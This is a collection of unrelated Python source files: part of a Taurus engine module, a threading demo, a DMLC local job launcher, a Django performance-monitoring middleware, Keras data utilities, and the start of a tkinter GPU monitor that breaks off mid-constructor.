self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
|
star_wars_2_threads.py | import threading
from time import sleep
from random import random
def run(n):
t = threading.current_thread()
for count in range(n):
print(f'Hello from {t.name}! ({count})')
sleep(0.9 * random())
yoda = threading.Thread(target=run, name='Yoda', args=(4, ))
vader = threading.Thread(target=run, name='Vader', args=(3, ))
yoda.start()
vader.start()
yoda.join()
vader.join()
|
local.py | """Submission job for local jobs."""
# pylint: disable=invalid-name
import sys
import os
import subprocess
import logging
from threading import Thread
from . import tracker
keepalive = """
nrep=0
rc=254
while [ $rc -ne 0 ];
do
export DMLC_NUM_ATTEMPT=$nrep
%s
rc=$?;
nrep=$((nrep+1));
done
"""
def exec_cmd(cmd, role, taskid, pass_env):
"""Execute the command line command."""
if cmd[0].find('/') == -1 and os.path.exists(cmd[0]) and os.name != 'nt':
cmd[0] = './' + cmd[0]
cmd = ' '.join(cmd)
env = os.environ.copy()
for k, v in list(pass_env.items()):
env[k] = str(v)
env['DMLC_TASK_ID'] = str(taskid)
env['DMLC_ROLE'] = role
env['DMLC_JOB_CLUSTER'] = 'local'
ntrial = 0
while True:
if os.name == 'nt':
env['DMLC_NUM_ATTEMPT'] = str(ntrial)
ret = subprocess.call(cmd, shell=True, env=env)
if ret != 0:
ntrial += 1
continue
else:
bash = keepalive % (cmd)
ret = subprocess.call(bash, shell=True, executable='bash', env=env)
if ret == 0:
logging.debug('Thread %d exit with 0', taskid)
return
else:
if os.name == 'nt':
sys.exit(-1)
else:
raise RuntimeError('Get nonzero return code=%d' % ret)
def submit(args):
"""Submit function of local jobs."""
def mthread_submit(nworker, nserver, envs):
"""
customized submit script, that submit nslave jobs, each must contain args as parameter
note this can be a lambda function containing additional parameters in input
Parameters
----------
nworker: number of slave process to start up
nserver: number of server nodes to start up
envs: enviroment variables to be added to the starting programs
"""
procs = {}
for i in range(nworker + nserver):
if i < nworker:
role = 'worker'
else:
role = 'server'
procs[i] = Thread(target=exec_cmd, args=(args.command, role, i, envs))
procs[i].setDaemon(True)
procs[i].start()
# call submit, with nslave, the commands to run each job and submit function
tracker.submit(args.num_workers, args.num_servers, fun_submit=mthread_submit,
pscmd=(' '.join(args.command)))
|
middleware.py | import time
import sys
import traceback
import requests
import json
import threading
import logging
import django
from django.http import HttpResponse
from django.utils.deprecation import MiddlewareMixin
from django.conf import settings
logger = logging.getLogger(__name__)
logger.setLevel = logging.DEBUG #only logging error response
file_handlder = logging.FileHandler('apio.log')
logger.addHandler(file_handlder)
formatter = logging.Formatter(
'%(levelname)s:%(name)s:%(asctime)s:%(lineno)d:%(message)s')
file_handlder.setFormatter(formatter)
class ApioMiddleware(MiddlewareMixin):
"""Collates performance variables
and exception data to be shared with owner"""
def process_exception(self, request, exception):
try:
apio_url_exception = "https://apio.in/remote_data_exception"
#collating exception data
exception_data = {
"path": request.environ["wsgi.url_scheme"] + "://" \
+ request.environ["HTTP_HOST"] + request.get_full_path(),
"exception": exception.__class__.__name__+ \
": " + str(sys.exc_info()[1]),
"traceback":traceback.format_exc(),
"user": str(request.user),
"ip_address": get_client_ip(request),
"method": request.method
}
if exception_data["path"] != apio_url_exception:
#sending request on new thread
t = threading.Thread(
target=send_exception_data_request,
args=[exception_data])
t.start()
# t.join()
print("in exception mid")
print(threading.activeCount())
except Exception as e:
logger.debug(str(e))
return None
def process_request(self, request):
request.start_timestamp = time.time()
def process_response(self, request, response):
"""Calculate response time"""
try:
apio_perf_data_url = "https://apio.in/remote_perf_data"
response_timestamp = time.time()
#collating perf data
perf_data = {
"request_timestamp": request.start_timestamp,
"response_timestamp": response_timestamp,
"response_code": response.status_code,
"path": request.environ["wsgi.url_scheme"] + "://" \
+ request.environ["HTTP_HOST"] + request.get_full_path(),
"requester": str(request.user),
"ip_address": get_client_ip(request),
"method": request.method
}
if perf_data["path"] != apio_perf_data_url:
# Sending request on another thread
t = threading.Thread(
target=send_perf_data_request, args=[perf_data])
t.start()
print("in perf mid")
print("thread count:", threading.active_count())
# t.join()
except Exception as e:
logger.debug(str(e))
return response
def send_exception_data_request(exception_data):
"""sends perf data to remote server"""
try:
apio_url_exception = "https://apio.in/remote_data_exception"
headers = {"x-api-key":
settings.APIO_D["application_key"]
}
r = requests.post(apio_url_exception,
data=json.dumps(exception_data),
headers=headers)
except Exception as e:
logger.debug(str(e))
def send_perf_data_request(perf_data):
"""sends perf data to remote server"""
try:
apio_perf_data_url = "https://apio.in/remote_perf_data"
headers = {"x-api-key":
settings.APIO_D["application_key"]
}
r = requests.post(apio_perf_data_url,
data=json.dumps(perf_data),
headers=headers)
except Exception as e:
logger.debug(str(e))
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[-1].strip()
else:
ip = request.META.get('REMOTE_ADDR')
return ip
|
data_utils.py | """Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format is 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type is 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type is 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
""" # noqa
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size is -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt):
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm is 'sha256') or
(algorithm is 'auto' and len(file_hash) is 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`. The method `__getitem__` should return a complete batch.
# Notes
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch which is not
the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = mp.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Send current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = mp.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Get the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
# Arguments
uid: int, generator identifier
# Returns
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
if wait_time is not None:
warnings.warn('`wait_time` is not used anymore.',
DeprecationWarning)
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
list(map(lambda f: f.wait(), last_ones))
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
"Your generator is NOT thread-safe."
"Keras requires a thread-safe generator when"
"`use_multiprocessing=False, workers > 1`."
"For more information see issue #1638.")
six.reraise(*sys.exc_info())
|
nvidiaGpuMonPy.py | from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
import tkinter as tk
import psutil
import pynvml
import socket
import threading
import os
# __MAIN__
def main():
# Dictionary for the border effects around the frames and labels
border_effects = {
"flat": tk.FLAT,
"sunken": tk.SUNKEN,
"raised": tk.RAISED,
"groove": tk.GROOVE,
"ridge": tk.RIDGE,
}
# Initialize NVML and get the GPU handle which is used by NVML to get the GPU info
pynvml.nvmlInit()
_handle = pynvml.nvmlDeviceGetHandleByIndex(0)
# Class to create and configure the main widget, frames, labels, and the functions used in gathering the GPU data
class App(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_thread = threading.Thread(target=self.start_server) # start the server on a separate thread
self.allowSending = False # sending off by default
self.disconnect = False # used to stop the server
self.has_name = False
# Configure the main window
self.title('NVIDIA GPU MON PY')
# Set window height and width and position in center of screen
w = 320
h = 180
sw = self.winfo_screenwidth()
sh = self.winfo_screenheight()
x = (sw / 2) - (w / 2)
y = (sh / 2) - (h / 2)
self.geometry("%dx%d+%d+%d" % (w, h, x, y))
self.resizable(False, False)
self.configure(bg='black')
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=0)
# Settings window
# File menu
self.menubar = Menu(master=self)
path = os.path.join(os.getcwd(), 'images', 'icon', 's_ico.png')
self.load = Image.open(path)
self.settings_icon = ImageTk.PhotoImage(self.load)
self.server_menu = Menu(self.menubar, tearoff=0)
self.server_menu.add_command(label="Start Server", command=self.server_thread.start)
self.server_menu.add_command(label="Settings", image=self.settings_icon, compound="left",
command=self.settings_menu)
self.menubar.add_cascade(label="File", menu=self.server_menu)
self.server_menu.add_separator()
self.server_menu.add_command(label="Exit", command=self.exit)
# Frame containing the Label for the GPU Name
# -------------------------------------------
self.name_frame = tk.Frame(master=self, bg='black', relief='sunken', borderwidth=3)
self.name_frame.rowconfigure(0, weight=1)
self.name_frame.columnconfigure(0, weight=1)
self.name_frame.grid(row=0, column=0, sticky=N+S+E+W)
# Label containing the GPU name
self.name_label = tk.Label(master=self.name_frame, text=self.get_gpu_name(), width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.name_label.grid(row=0, column=0, sticky=W+E)
# ___________________________________________
# Frame containing the Labels for the remaining GPU information
# _____________________________________________________________
self.info_frame = tk.Frame(master=self, bg='black', relief='sunken', borderwidth=3)
self.info_frame.rowconfigure(1, weight=1)
self.info_frame.columnconfigure(0, weight=1)
self.info_frame.rowconfigure(5, weight=1)
self.info_frame.columnconfigure(1, weight=1)
self.info_frame.grid(row=1, column=0, sticky=N+S+E+W)
# configure the info Labels
self.cpu_util_label1 = tk.Label(master=self.info_frame, text="CPU Utilization:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.cpu_util_label2 = tk.Label(master=self.info_frame, text="", width=25,
bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_util_label1 = tk.Label(master=self.info_frame, text="GPU Utilization:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_util_label2 = tk.Label(master=self.info_frame, text="", width=25,
bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_temp_label1 = tk.Label(master=self.info_frame, text="GPU Temperature:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_temp_label2 = tk.Label(master=self.info_frame, text="{}\N{DEGREE SIGN}C"
.format(self.get_gpu_temps()), width=25, bg='black', fg='white',
relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_clock_label1 = tk.Label(master=self.info_frame, text="GPU Clock Speed:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_clock_label2 = tk.Label(master=self.info_frame, text="", width=25,
bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.mem_clock_label1 = tk.Label(master=self.info_frame, text="Memory Clock Speed:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.mem_clock_label2 = tk.Label(master=self.info_frame, text="", width=25,
bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_fan_speed_label1 = tk.Label(master=self.info_frame, text="GPU Fan Speed:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_fan_speed_label2 = tk.Label(master=self.info_frame, text="", width=25, bg='black', fg='white',
relief='sunken', borderwidth=2, anchor=CENTER)
self.gpu_power_label1 = tk.Label(master=self.info_frame, text="GPU Power:", width=25, bg='black',
fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
